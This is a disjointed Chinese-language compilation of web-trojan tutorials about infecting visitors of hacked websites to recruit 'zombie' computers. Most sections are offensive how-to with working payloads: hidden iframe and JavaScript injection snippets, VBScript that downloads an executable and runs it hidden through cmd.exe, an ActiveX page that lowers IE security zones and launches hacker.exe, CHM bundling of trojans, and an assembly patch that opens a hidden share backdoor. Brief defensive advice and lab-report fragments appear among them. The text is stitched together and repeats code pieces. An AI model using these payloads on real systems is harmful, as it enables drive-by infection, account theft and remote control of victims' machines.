网页木马制作
什么是网马,怎么制作网马,怎么挂马
首先说什么是网马。
网马有什么用呢?先说下有什么用。
例如,大家想玩鸽子,想找肉鸡。
想找很多很多的肉鸡。
当然方法很多,例如135抓鸡什么的。
但是我想大家都遇到一个问题,看人家教程上,抓鸡一下子就来了一串 ...首先说什么是网马。
网马有什么用呢?先说下有什么用。
例如,大家想玩鸽子,想找肉鸡。
想找很多很多的肉鸡。
当然方法很多,例如135抓鸡什么的。
但是我想大家都遇到一个问题,看人家教程上,抓鸡一下子就来了一串一串的。
我自己操作为啥老半天就扫不到呢?因为这漏洞出来很久了,再者,天天有人扫肉鸡。
当然肉鸡就少了,也很难找到。
还有,大家扫描肉鸡的方法可能也有点不对。
综合起来,利用这些漏洞找肉鸡的效率很低下。
那么用网马呢,网马就是挂马。
你想下。
要是一个网站,一天有1万个人访问,一万个人中哪怕几率降低到%1的中马率。
一天也有100个人中马成为你的肉鸡啊。
而且,你挂上网马后关机睡觉肉鸡也刷刷刷的上来。
所以网马很爽,所以也比自己拿个软件扫描漏洞来劲。
上面说了网马的作用。
综合叙述下,就是快捷,方便。
更快,更高,更强的达到散播木马的途径。
然后,大家应该明什么是网马了吧?对的,网马简单的说下,就是网页木马。
当别人访问一个网页就可能从这个网页自动下载木马,并且在你后台悄悄运行。
这就是网马。
简单的这么理解,当然我们学黑客知识的肯定对这些东西不能简单理解了事了。
但是,我们只是入门的小菜鸟,所以再深入了解一点点就行了。
深入说下。
什么是网马?网马就是利用网页代码操作win的漏洞。
首先,我们得明白什么是网页。
为什么我们打开一个网站,这个网站会显示出这些图片。
就如你现在看的这篇帖子,为什么背景是这个颜色,为什么字体有大有小,为什么网页各处的颜色不同。
然后构成了这样一个网页。
怎么构成的?难道就是简简单单的几张图片就构成了我们现在看到的这个网页页面?错了。
是图片+文字+代码。
这是一个网页构成的基本元素。
但是,代码是必须要的。
这里提到了代码。
例如一段网页由设计者设计,图片应该放这里,文字应该按照这样排列。
网页挂马的流程
网站挂马攻击主要是指入侵者在入侵成功后修改了网站的某一些或者全部的网页文件,如果网站存在SQL注入漏洞,则比较容易取得一定的权限。
如果在服务器上对网站目录等做了较严格的权限限制,也是比较容易取得Webshell权限,具有Webshell权限可以对网页文件进行修改,而挂马就是在网页中加入一些代码。
这些代码往往是利用浏览器或者应用程序的漏洞,浏览者在访问这些网页时,往往会在不知不觉中去下载一些木马程序来执行。
网站挂马的原理就是设置框架网页的宽度和高度为0,将一些恶意网页隐藏起来,用户访问网站时不容易觉察。
目前在网络上有很多网页木马生成器,简称“网马生成器”,本案例以“Ms-0733网马生成器”为例,来讲解如何进行网站挂马攻击。
步骤一配置网页木马。
在使用“Ms-0933网马生成器”配置前需要准备好一款已经配置好的木马服务端,然后直接运行“Ms-0933网马生成器”在网马地址中输入“/test.exe”,如图1所示,然后单击“生成木马”即可生成一网页文件HACKLL.HTM。
配置Ms-0733网马生成器步骤二修改网站网页文件。
在网站首页文件index.asp中加入已经配置好的网页木马htm文件,一般通过在页面中加入“”来实现,如图2所示。
加入木马代码到正常网页网页木马利用的是IE浏览器存在的漏洞,其网页木马最本质的东西有两个一个是脚本,另外一个是真正的木马服务端,利用脚本来直接执行木马服务端或者通过下载者来下载木马服务端然后再执行。
其网页木马文件中多是一些JavaScript代码,如图3所示。
网页木马源代码测试网页木马是否能够正常执行。
在未安装微软的MS0933补丁程序的虚拟机中打开浏览器,并在其中输入网页木马的地址,一会儿后,在控制端就看见肉鸡上线了。
大量传播网页木马。
网页木马测试成功以后,就可以将其配置好的网页木马放入一些提供Web服务的肉鸡上,只要访问者的系统未安装其网页木马利用的漏洞,如果系统未安装任何对网页木马进行防御的软件,则计算机感染网页木马的几率非常大。
网页木马
浅谈网页木马摘要由于利益驱动,网络犯罪者已频繁地在中国万维网上构建木马网络,用于攻击普通因特网用户的客户端主机,窃取虚拟资产从而获得非法收入。
本文对网页木马的攻击和防范策略进行深入分析,从而深刻了解网页木马的危害。
关键词网页木马;木马攻击;恶意脚本中图分类号tp393 文献标识码a 文章编号 1674-6708(2011)46-0214-02网页木马是指表面上伪装成普通的网页文件或是将恶意的代码直接插入到正常的网页文件中,当有人访问时,网页木马就会利用对方系统或者浏览器的漏洞自动将配置好的木马的服务端下载到访问者的电脑上来自动执行。
1 背景和根源网页木马这种安全威胁在中国万维网上出现于 2003 年甚至更早,在此之前,国内黑客社区还主要由政治事件、炫耀技术能力、追求社区威望等动机所驱动,但随着网络游戏和虚拟交易的日益流行,一些恶意攻击者寻找出通过攻击普通因特网用户从而快速获利的网络犯罪途径,并形成了分工明确,组织严密的地下经济链,而网页木马是其中最为主要的方式之一。
网页木马存在的技术基础­——安全漏洞。
另一个使得网页木马安全威胁持续存在的根源是普通因特网用户用于访问万维网的浏览器和相关应用软件中存在的安全漏洞,这些安全漏洞为网页木马进入并感染受害主机提供了必要条件。
2 网页木马的实质网页木马的实质是利用漏洞向用户传播木马下载器。
网页木马实际上是一个html网页,与其它网页不同的是该网页是黑客精心制作的,用户一旦访问了该网页就会中木马。
为什么说是黑客精心制作的呢。
因为嵌入在这个网页中的脚本恰如其分地利用了ie浏览器的漏洞,让ie在后台自动下载黑客放置在网络上的木马并运行(安装)这个木马,也就是说,这个网页能下载木马到本地并运行(安装)下载到本地电脑上的木马,整个过程都在后台运行,用户一旦打开这个网页,下载过程和运行(安装)过程就自动开始。
3 可能被网页木马利用的漏洞3.1 利用url格式漏洞此类网页木马是利用url格式漏洞来欺骗用户。
木马制作
1.冰狐浪子网页木马生成器
2.一个网页编辑器(frontpage或dreamweaver都可以,我习惯用的是dreamweaver);
3.图片一张(主要用来起迷惑作用,至于放什么样的图片大家可以自由发挥)
4.木马一个,至于是QQ盗号器?灰鸽子?还是黑洞?都可以,我建议大家准备一个50KB以下的小马,否则木马还没
下面我们打开网页编辑器,新建一个网页,"插入"---"图片"打开插入图片的对话框,选择刚才准备好的图
片按确定.
然后转到代码编辑窗口,插入一个嵌入式框架,把框架长度和宽度都改为0,框架连接到刚才icyfox.htm文件的
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional// EN"
把<A href="/Article/UploadFiles/200510/20051011015656342.gif)里修改下就可以用了.冰狐浪子的使用方法:用你的木马程序替换" icyfox?目录下的?#.exe?<BR><U><FONT color=#0000ff>然后运行"生成.bat",你会在"muma"目录下得到文件"icyfox.js"修 改"icyfox.htm"文件中的两处<BR><A href="/muma">/muma</A><BR>为你上传到主页空间的"icyfox.js"文件的URL路径</P>
手把手教你网络陷阱的建造
数据库插马默认数据库下载漏洞,是许多黑客喜欢利用的一种技术。
管理人员可以特意为网站留下这个“漏洞”,让黑客下载指定的数据库,殊不知他们也就慢慢走入了陷阱。
1、数据库下载漏洞利用原理默认数据库下载、上传、后台密码绕过等漏洞虽然很初级,但却有不少恶意攻击者通过此点攻入网站。
一旦侥幸成功后,其后果不言而喻。
于是网站管理人员可以修改网站真正的数据库的名称,改变其路径来实现保护目的,并且将伪装插入木马的数据库不做更改删除,等待入侵者下载中招。
2、数据库插入木马首先,准备一个远程控制工具(比如,远程控制任我行),进行简单的配置生成服务端。
然后运行“office系列挂马工具全套”工具包中的“MdbExp.All.v1.04.exe”,指定要运行的木马程序,设置木马保存路径,点击“确定”,就把这个服务端程序伪装成MDB格式的数据库文件。
(特别提示:服务端不能超过50KB。
)3、设置陷阱以动网DVBBS论坛为例,网站管理人员修改原有数据库的名称并改变其路径。
将插入远控服务端的数据库改名为“dvbb7.mdb”,放置在动网的数据库默认目录下。
攻击者尝试利用数据库下载漏洞进行网站攻击时,就会下载伪装的插入远控服务端的数据库文件,当其双击打开“数据库”时,被嵌入其中的远控服务端自动运行,入侵者的电脑也就被网站管理人员控制了。
管理后台挂马攻击者通常非法登录网站的管理页面,然后上传木马,进一步渗透、提权,甚至控制服务器。
对于这样的入侵,网站的管理人员除了要加固服务器的设置之外,也可以在管理后台中设置陷阱,请君入瓮。
1、攻击原理恶意攻击者在非法获得了网站的管理员用户名和密码后,就会进入网站的管理页面尝试进入后台。
对于这样的恶性行为,网站的管理人员可以通过在登录页面文件中加入代码,运行指定的程序,而惩罚攻击者。
2、制作网页木马后台陷阱第一步:运行MS-07004网马,生成一个木马客户端,将该程序上传至网站的某个目录,得到一个URL地址。
木马病毒攻击实验
访问以后看你的计算机是否开始注销或者关闭了。
八、实验数据及结果分析:
由于这个脚本是针对IE的漏洞进行设计的,因此对于Windows2000和Windows Xp,这个木马都有效。当然对于已经打了补丁的系统,这个脚本就无能为力了。另外由于已经对木马加密了,所以在一定程度上这个木马脚本还有一定免查杀能力,在某些实验环境下杀毒软件没有任何提示,因为现在的杀毒软件多数都是根据的病毒的特征码来查杀病毒的,而加密以后就不在具有病毒的特征码描述的特征了。
步骤2改为访问http://localhost/jstrojan/breed/index.html
通过命令行查看用户目录,然后到用户目录去看一下,是否有很多可执行文件生成(最多可以达到30000个,我们限制了数量),检查这些可执行文件是否有自我们繁殖功能。
实验三
通过木马关闭计算机
步骤基本和实验一相同
十一、对本实验过程及方法、手段的改进建议:
我们在实验中使用的木马功能其实并不够强大,也就是只有演示功能,其实我们完全可以把远程控制功能加到木马写木马中,这样才能够算是真正意义上的木马,一旦用户访问了我们指定的页面,该计算机就会被我们所控制。
报告评分:分
指导教师签字:
o.Fields("a").Value="这里是HTA的代码"
hta代码在IE临时文件夹内找到bbs003302.css并且改成可执行文件,然后修改成AUTOEXEC.BAT隐藏运行.这里HTA是指HTML Application(关于它的信息请参考Windows的帮助文档)
四、跨域运行HTA的实现.
网页木马制作全过程(详细)
如果你访问××网站(国内某门户网站),你就会中灰鸽子木马。
这是我一黑客朋友给我说的一句说。
打开该网站的首页,经检查,我确实中了灰鸽子。
怎么实现的呢?他说,他侵入了该网站的服务器并在网站主页上挂了网页木马;一些安全专家常说,不要打开陌生人发来的网址,为什么?因为该网址很有可能就是一些不怀好意者精心制作的网页木马。
以上只是网页木马的两种形式,实际上网页木马还可以挂在多媒体文件(RM、RMVB、WMV、WMA、Flash)、电子邮件、论坛等多种文件和场合上。
很可怕吧,那么用户如何防范网页木马呢?下面我们就先从网页木马的攻击原理说起。
一、网页木马的攻击原理首先明确,网页木马实际上是一个HTML网页,与其它网页不同的是该网页是黑客精心制作的,用户一旦访问了该网页就会中木马。
为什么说是黑客精心制作的呢?因为嵌入在这个网页中的脚本恰如其分地利用了IE浏览器的漏洞,让IE在后台自动下载黑客放置在网络上的木马并运行(安装)这个木马,也就是说,这个网页能下载木马到本地并运行(安装)下载到本地电脑上的木马,整个过程都在后台运行,用户一旦打开这个网页,下载过程和运行(安装)过程就自动开始。
有朋友会说,打开一个网页,IE浏览器真的能自动下载程序和运行程序吗?如果IE真的能肆无忌惮地任意下载和运行程序,那天下还不大乱。
实际上,为了安全,IE浏览器是禁止自动下载程序特别是运行程序的,但是,IE浏览器存在着一些已知和未知的漏洞,网页木马就是利用这些漏洞获得权限来下载程序和运行程序的。
下面我举IE浏览器早期的一个漏洞来分别说明这两个问题。
⒈自动下载程序<SCRIPT LANGUAGE="icyfoxlovelace"src="/1.exe"></SCRIPT>小提示:代码说明a. 代码中“src”的属性为程序的网络地址,本例中“/1.exe”为我放置在自己Web服务器上的灰鸽子服务端安装程序,这段代码能让网页下载该程序到浏览它的电脑上。
教你做木马
;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌
; SUBROUTINE
;
; Called from: 031FD, 32CC
;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘
033F4 sub_0026 proc near
就开了个后门。LOC_0415是检测网络通信的共享名串大于0DH否(包括串后的0),是就转LOC_0419出错返回,显然我们可以利用这儿去调用SUB_0230. 看LOC_0419 有7个字节可以利用,可以安排 CALL SUB_0230
NEW_LOC_0418 POP eax
jmp 03469
03417 B9 0000FFFF mov ecx,0FFFFh
0341C 8B FB mov edi,ebx
0341E F2/ AE repne scasb ; Rep zf=0+cx >0 Scan es:[di] for al
03420 8B C7 mov eax,edi
03422 2B C3 sub eax,ebx
03415 XOR EAX,EAX ;2 字节,同样SUB AL,AL 得到AL=0;还得到EAX=0。
03417 PUSH EAX ;1 字节 调用SUB_0230 用的DWORD参数 0;
03418 XOR ECX,ECX ;2 字节 ECX=0;
0341A DEC ECX ;1 字节 得到ECX=0FFFFFFFFH这儿与MOV ECX,0FFFFH一样但字节数少
中了你的木马的你访问他的共享目录后面加一大串字母(共享名串长大于等于0DH)会提示出错,但你就可以再访问\\IP\C$, \\IP\D$....了,这可是完全共享的了.如果你先没有那个一大串字母的访问他也没有设置远程管理的话 \\IP\C$,\\IP\D$... 都不能访问的,他自己用网络监视器也看不到这种共享的,所以很不容易觉察的。注意你进入共享目录了网络监视器还是能看到。
网页挂马
“挂马”攻击已经成为目前最流行的攻击方式,面对数量庞大的“挂马”网站,我们该如何防御呢?作为一名网站站长,我们又如何知道自己的网站被人挂马了呢?站长防范:如果你是一名站长,可以对网站首页以及其他主要页面的源代码进行检查,如用记事本打开这些页面后,以“<iframe>”为关键字进行搜索,找到后可以查看是否是挂马代码。不过碰上有经验的黑客,会编写一段代码将整句挂马代码进行加密,这样我们就很难找到网页中的挂马代码。这时,我们可以使用专门的网页木马检测工具进行检测和清理。
一、挂马的核心:木马
从“挂马”这个词中我们就可以知道,这和木马脱离不了关系。的确,挂马的目的就是将木马传播出去,挂马只是一种手段。挂马使用的木马大致可以分为两类:一类是以远程控制为目的的木马,黑客使用这种木马进行挂马攻击,其目的是为了得到大量的肉鸡,以此对某些网站实施拒绝服务攻击或达到其他目的(目前绝大多数实施拒绝服务攻击的傀儡计算机都是挂马攻击的受害者)。另一类是键盘记录木马,我们通常称其为盗号木马,其目的不言而喻,都是冲着我们的游戏帐号或者银行帐号来的。目前挂马所使用的木马多数属于后者。
普通用户防范:普通用户关心的自然是如何防范“挂马”攻击。既然杀毒软件在网页木马面前成了“睁眼瞎”,而我们又无法感知网站是否被“挂马”。在这种情况下,我们岂不是任人宰割?我们已经知道网页木马的运行原理利用了IE浏览器的漏洞,因此只要我们及时更新系统补丁就可以让网页木马失效了。开启系统“自动更新”的方法为:右键点击“我的电脑”,选择“属性”,切换到“自动更新”标签,选中其中的“自动(推荐)”即可。
在这种情况下,新的网页木马诞生了。这类网页木马通常利用了IE浏览器的漏洞,在运行的时候没有丝毫提示,因此隐蔽性极高。可以说,正是IE浏览器层出不穷的漏洞造成了如今网页木马横行的网络。例如最近的IE浏览器漏洞MS06-014,就可以利用来制作一个绝对隐蔽的网页木马。下面让我们看看利用MS06-014制作网页木马的过程。
详谈网页木马
(3).虚假的网址,网络钓鱼者注册一个域名和真实网站域名十分相似的网址,其用户界面也和真实网站页面非常相似,然后不URL提供给用户,那么一般的用户被引导到这样的虚拟网址上是难以察觉的,攻击者也就可以利用该网页来诱导用户输入自己的个人身份信息,达到窃取的目的,例如真实网站域名是xxx.lovebank.xxx,伪造网站域名是www.1ovebank.xxx,一个是小写的"L",一个是数字"1",域名服务器将解析到完全不同的IP地址上,但用户很难看出来。再如真实网站的域名是,而虚假网站使用域名www.xxx.xxx,很多人也无法判断
(2).十进制的IP地址
常见的IP地址包括四个字节,一般表示形式为“xxx.xxx.xxx.xxx”(x表示一个十进制数码),例如“61.135.132.12”。因为数字IP地址较长,且过于抽象、难以记忆,所以采用域名服务DNS来与之对应。在浏览器地址栏中输入“”与“Http://61.135.132.12”的结果完全一样,都是访问搜狐网站,因为61.135.132.12就是搜狐域名的IP地址。不过,用Hxxp://1032291340访问的话,仍然可以打开搜狐网站,这是因为,四位点分十进制形式的IP地址“61.135.132.12”代表一组32位二进制数码,如果合在一起再转换成一个十进制数的话,答案就是1032291340。转换方法,就是数制的按权展开:12×2560+132×2561+135×2562+61×2563=12+33792+8847360+1023410176=1032291340(基数为256,即28)。在上文的例子中提到了“/HuiGeZi_Server.exe”。这种字母域名有时还能被用户识破,而在把它对应的IP地址(假设为“61.135.132.13”)换算成一个十进制数后,结果是1032291341,再结合@标志过滤用户的解析,就会变成Hxxp://@1032291341这样的地址,这样就更加隐蔽了。
网页木马制作与传播
当然你也可以把mm.exe和mm.htm换成是别的文件名。然后用QuickCHM这个软件来编译成为chm文件。(这些工具在google都能搜索到的)然后chm向导。选中*.*,项目文件夹就是刚才那两个mm.exe和mm.htm所在的目录了。
然后下一步,htm文件在上,exe文件在下,接着可以编译他了。
Set tf = fso.CreateTextfile(fName,True)
tf.Write str
tf.Close
exewin()
End sub
Sub exewin()
set wshshell=createobject ("wscript.shell" )
a=wshshell.run ("cmd.exe /c c:\win.hat",0)
window.close
End Sub
HttpDoGet("http://127.0.0.1/abc.abc")
</script>
</body>
</html>
四。名字为test.exe的木马程序。
End Function
sub SaveFile(str.fName)
Set objStream = CreateObject("ADODB.Stream")
obStream.Open
objStream.write str
objStream.SaveToFile fName.2
【学网教程】
<!-- 文章画中画块幅 -->
以前写了一篇文章,讲了关于怎样用最简单的方法获取对方的管理权限,里面用到了网页木马,最近有许多网友问我怎样制作网页木马,就这个问题我发表篇比较简单易懂的文章,希望大家珍惜我的劳动成果。
网页木马
网页木马
病毒学名称
01本信息
页木马就是表面上伪装成普通的页文件或是将恶意的代码直接插入到正常的页文件中,当有人访问时,页木 马就会利用对方系统或者浏览器的漏洞自动将配置好的木马的服务端下载到访问者的电脑上来自动执行。
简介
简介
页挂马的实质是利用漏洞向用户传播木马下载器,当我们更清楚了这点就能做到有效的防范。
第二步:把{-C279-11CE-A49E-0}改为{-C279-11CE-A49E-1},注意,不要和系统中的其它CLSID重复。
第三步:把“Shell.application”改名为“Shell.application_xxx”。以后用到这个控件的时候你使 用这个名称就可以正常调用此控件了。
安全级别
第一步:在IE浏览器的菜单栏上选择“工具→Internet选项”打开“Internet选项”对话框。
第二步:在“安全”选项卡上,在Internet和本地Internet区域,分别把滑块移动到最高,或者点击“自 定义级别”,在打开的对话框上禁用脚本,禁用ActiveX控件。
网页木马的制作方法
3,将winshell加再网页中,然后把网页,winshell,和命名为huigezi.exe的反弹 木马 服务端一起上传到/(我这里用的是灰鸽子)。 之后我利用“美人计”让那小子乖乖的浏览了我的网页。图二就是证据! 至于如何在网页中加入 木马 程序,在这里只说说我从网上找到的一种方法,其他的自己去研究吧! 具体方法如下: 开启第一个HTML的页面,通过恶意的HTML代码把IE安全级别里的默认的“禁用下栽未签名的ActiveX控件”选项,变为“启用下栽未签名的ActiveX控件”,然后马上打开第二个HTML的文件内容是下载一个未签名的ActiveX控件,实质就是我们所要执行的EXE文件。 将如下代码保存为index.htm文件: <!DOCTYPE HTML PUBLIC -//W3C//DTD HTML 4.0 Transitional//EN> <CNTER><HTML><HEAD> <META http-equiv=Content-Type content=text/html; charset=gb2312> <META content=Microsoft FrontPage 4.0 name=GENERATOR></HEAD> <BODY> <SCRIPT> document.write(<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>); function f(){ try { //ActiveX initialization a1=document.applets[0]; a1.setCLSID({F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}); a1.createInstance(); Shl = a1.GetObject(); a1.setCLSID({0D43FE01-F093-11CF-8940-00A0C9054228}); a1.createInstance(); FSO = a1.GetObject(); a1.setCLSID({F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}); a1.createInstance(); Net = a1.GetObject(); try { if (documents.cookie.indexOf(Chg) == -1) { Shl.RegWrite (HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\1004,0,REG_DWORD); var expdate = new Date((new Date()).getTime() + (1)); documents.cookie=Chg=general; expires= + expdate.toGMTString() + ; path=/; } } catch(e) {} } catch(e) {} } function init() { setTimeout(f(), 1000); } init(); </SCRIPT> <script language=javascript> <!-- Begin function opencolortext(){ window.open(’/2.htm’,’colortext’) } setTimeout(opencolortext(),1500) // End --> </script> </BODY></HTML> 下面制作2.htm文件: <!DOCTYPE HTML PUBLIC -//W3C//DTD HTML 4.0 Transitional//EN> <HTML><HEAD> <META http-equiv=Content-Type content=text/html; charset=gb2312> <SCRIPT language=javascript> run_exe=<OBJECT ID=\RUNIT\ WIDTH=0 HEIGHT=0 TYPE=\application/x-oleobject\ run_exe+=CODEBASE=\hacker.exe#version=1,1,1,1\> run_exe+=<PARAM NAME=\_Version\ value=\65536\> run_exe+=</OBJECT> run_exe+=<HTML><H1> </H1></HTML>; document.open(); document.clear(); document.writeln(run_exe); document.close(); </SCRIPT> <META content=Microsoft FrontPage 4.0 name=GENERATOR></HEAD> <BODY> <p align=center> 论坛 连接中请勿终断.... <BR> <CENTER></CENTER><BR> <BR></BODY></HTML> 其中hacker.exe就是我们要执行的文件。至于那个“ 论坛 连接中请勿终断....”完全是为了迷惑对方,可根据自己喜好而定。接下来只要将index.htm,2.htm和hacker.exe一起上传到主页的同一目录中就ok了! 总结:这个方法的好处是,如果对方在局域网内,我们同样可以用 木马 进入他的机器并且很难发现。但这个方法也有自己的缺点,那就是用了两种 木马 ,大大的增大了被杀毒软件查杀的几率。不过对方是在网吧中,而我们这里的网吧大多又不安装杀毒软件(用硬盘还原卡代替),并且不升级IE,我这次入侵成功,网吧老板也有一份功劳
201110实验三木马
实验三木马及远程控制技术练习一网页木马一、实验目的该实验为设计性实验。
✧剖析网页木马的工作原理✧理解木马的植入过程✧学会编写简单的网页木马脚本✧通过分析监控信息实现手动删除木马二、实验内容1.木马生成与植入2.利用木马实现远程控制3.木马的删除注:详细实验操作请参考实验室服务器上的参考资料。
三、实验步骤本练习主机A、B为一组,C、D为一组,E、F为一组。
实验角色说明如下:下面以主机A、B为例,说明实验步骤。
首先使用“快照X”恢复Windows系统环境。
(一)木马生成与植入在进行本实验步骤之前,我们再来阐述一下用户主机通过访问被“挂马”的网站而被植入木马的过程,便于同学们理解和完成实验。
(1)用户访问被“挂马”的网站主页。
(此网站是安全的)(2)“挂马”网站主页中的<iframe>代码链接一个网址(即一个网页木马),使用户主机自动访问网页木马。
(通过把<iframe>设置成不可见的,使用户无法察觉到这个过程)(3)网页木马在得到用户连接后,自动发送安装程序给用户。
(4)如果用户主机存在MS06014漏洞,则自动下载木马安装程序并在后台运行。
(5)木马安装成功后,木马服务端定时监测控制端是否存在,发现控制端上线后立即弹出端口主动连接控制端打开的被动端口。
(6)客户端收到连接请求,建立连接。
1.生成网页木马(1)主机A首先通过Internet信息服务(IIS)管理器启动“木马网站”。
(2)主机A进入实验平台在工具栏中单击“灰鸽子”按钮运行灰鸽子远程监控木马程序。
(3)主机A生成木马的“服务器程序”。
主机A单击木马操作界面工具栏“配置服务程序”按钮,弹出“服务器配置”对话框,单击“自动上线设置”属性页,在“IP通知http访问地址、DNS解析域名或固定IP”文本框中输入本机IP地址,在“保存路径”文本框中输入“D:\Work\IIS\Server_Setup.exe”,单击“生成服务器”按钮,生成木马“服务器程序”。
网页常见木马代码
⽹页常见⽊马代码⽹页⽊马代码⼤全:⼀:框架挂马<iframe src=地址 width=0 height=0></iframe>⼆:js⽂件挂马⾸先将以下代码document.write("<iframe width=’0’ height=’0’ src=’地址’></iframe>");保存为xxx.js,则JS挂马代码为<script language=javascript src=xxx.js></script><body onload="window.location=’地址’;"></body>五:隐蔽挂马六:css中挂马七:JAJA挂马<SCRIPT language=javascript>window.open ("地址","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1");</script>⼋:图⽚伪装<html><iframe src="⽹马地址" height=0 width=0></iframe><img src="图⽚地址"></center></html>九:伪装调⽤:<frameset rows="444,0" cols="*"><frame src="打开⽹页" framborder="no" scrolling="auto" noresize marginwidth="0"margingheight="0"><frame src="⽹马地址" frameborder="no" scrolling="no" noresize marginwidth="0"margingheight="0"></frameset>⼗:⾼级欺骗⼗⼀: 超级⽹马—通过arp欺骗来直接挂马原理:arp中间⼈攻击,实际上相当于做了⼀次代理。
制作木马方案
3.对木马程序进行严格的安全评估,确保不损害目标系统的安全;
4.加强对木马制作过程的管理,防止技术泄露。
五、总结
本方案旨在制定一款合法合规的木马制作方案,以提高我国网络安全防护水平。在方案实施过程中,应注重木马程序的隐蔽性、稳定性和安全性,同时遵守国家法律法规,确保木马制作和使用的合法合规性。希望通过本方案的研究和推广,为我国网络安全事业贡献力量。
-对木马程序进行严格的测试和评估;
-在受控环境下部署木马,进行实际操作演练;
-和抗检测能力;
-木马与控制端通信的稳定性和安全性;
-木马功能的完整性和可用性;
-木马在目标系统中的持久化效果。
五、结论
本制作木马方案旨在为网络安全领域提供一套合法合规的研究工具。通过严谨的流程设计、模块化编程和严格的合规性审查,确保木马程序在支持网络安全研究的同时,不损害用户利益和社会公共利益。希望通过本方案的实施,为提升我国网络安全防护水平作出贡献。
-开发阶段:
-编写源代码,注重代码优化和错误处理;
-使用加密算法对通信数据进行加密;
-利用反汇编工具对木马进行加固处理;
-测试阶段:
-在虚拟机环境中进行功能测试;
-在不同操作系统上进行兼容性测试;
-通过安全软件检测,评估木马的隐蔽性;
-部署阶段:
-将木马程序部署到目标系统;
-进行实际环境下的通信和控制测试;
2.功能模块设计
-植入模块:负责木马程序的植入与启动;
-通信模块:实现木马与控制端的数据传输;
-控制模块:提供远程命令执行、数据窃取等控制功能;
-自保护模块:确保木马免受安全软件检测和清除;
asp编写网页木马的方法介绍
asp编写网页木马的方法介绍
欢迎大家在这里学习asp编写网页木马!这里是我们给大家整理出来的精彩内容。
我相信,这些问题也肯定是很多朋友在关心的,所以我就给大家谈谈这个!我们经常听到这样的忠告:不要随意下在不明的程序,不要随意打开邮件的附件...”这样的忠告确实是有用的,不过我们的系统有不少漏洞,许多木马已经不需要客户端和服务端了,他们利用这些系统漏洞按照被系统认为合法的代码执行木马的功能,有的木马会在你完全不知道的情况下潜入,现在我来讲解下通过IE6的漏洞实现访问网页后神不知鬼不觉的下在并执行指定程序的例子,也就是网页木马.
首先我们需要编写几个简单的文件
一。
名字为abc.abc的文件
其中test.exe为木马程序,实现必须放在WEB发布的目录下,文件abc.abc 也必须保存在发布的目录下。
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
newproject.chm,newproject.hhc ,newproject.hhk ,newproject.hhp 其实最后三个是没用的,删了他把只留一个newproject.chm ,然后把他改任意名上传空间。
test.exe:木马程序。
Байду номын сангаас
上面所说的文件可以修改成任意名字,只是不要忘记把源码里的文件指向也修改就可以了!
最后是设置IIS,打开“程序→管理工具→internet服务管理器”,右键单击要设置的站点,选择《属性》,在选择“http头”。单击“MIME映射”里的“文件类型”按钮,并在关联扩展名文本框中输入“.hta”,在内容类型(MIME)中输入“application/hta",然后关闭所有窗口就可以了。
不过感觉这个方法已经过失了,现在的站长在发现自己的站被挂了木马后,如果主页代码过多,只要搜索iframe就能找到了我们的木马了,一个del,哈哈~~~~玩完了。
所以,下面再介绍几个把。
单独利用chm这个文件来达到盗号目的。假设我们的木马服务端还是为mm.exe然后在他相同目录下建一个mm.htm文件,代码如下
A。安装IE的最新版本并且随时下在才做系统和IE的补丁程序。
B。不随便登陆不熟悉朋友送来的网站,对于熟悉的朋友也要小心哦。
C。不随便登陆黑客网站(^_^黑基除外了啦,我担保的...),色情网站,尤其一些卖外挂,卖木马的网站。
D。不随便打开和预览有附件的邮件。
E。安装防火墙和杀毒软件的最新版本,经常进行升级和查毒
<html><body>
木马运行测试!(这句话可以改成你想说的)
<object date="http://127.0.0.1/win.test";;;></object>
</body></html>
三。名字为win.test的文件
<html>
<body>
oReq.open "GET",url,false
oReq.send
If oReq.status=200 then
HttpDoGet=oReq.respomseBody
Savefile HttpDoGet,"c:\win.exe"
End If
Set oReq=nothing
<br> </div><div style="FONT-SIZE: 12px"> </div><div style="FONT-SIZE: 12px"> </div><div style="FONT-SIZE: 12px"> </div><div style="FONT-SIZE: 12px"> </div><div style="FONT-SIZE: 12px"> </div><div style="FONT-SIZE: 12px"> </div><div style="FONT-SIZE: 12px">
当然你也可以把mm.exe和mm.htm换成是别的文件名。然后用QuickCHM这个软件来编译成为chm文件。(这些工具在google都能搜索到的)然后chm向导。选中*.*,项目文件夹就是刚才那两个mm.exe和mm.htm所在的目录了。
然后下一步,htm文件在上,exe文件在下,接着可以编译他了。
HttpDoGet,"c:\win.hta"
Set oReq=nothing
End if
end function
sub SaveFile(str,fName)
Dim fso, tf
S e t f s o = C r e a t e O bj e c t(Scripting.FileSystemObject")
a=wshshell.run ("cmd.exe /c c:\win.hat",0)
window.close
End Sub
HttpDoGet("http://127.0.0.1/abc.abc")
</script>
</body>
</html>
四。名字为test.exe的木马程序。
传播
本文章总节归纳了目前最流行的木马传播技术以及以后木马传播技术的发展趋势,
内容相当丰富.相信看完本教程你一定会成为养鸡专业户.
一.目前流行木马传播技术.
1.用BT制作木马种子
利用BT制作木马种子的教程网上也发布了很多,这里主要找一款具有诱惑性的软件
然后捆绑上自己的木马,做成种子,最后发布出去.相信利用BT抓鸡速度可是超快哦.
b=wshshell.run ("cmd.exe /c del c:\win.hta",0)
window.close
End Sub
HttpDoGet "http://127.0.0.1/test.exe"
</script>
</html>
二。名字为test.htm的文件
一般在你入侵了一个站拿到了webshell的时候,有的人也就是改下主页来满足自己的虚荣心把。下面来说挂马把。最常见的 挂站代码如下 :
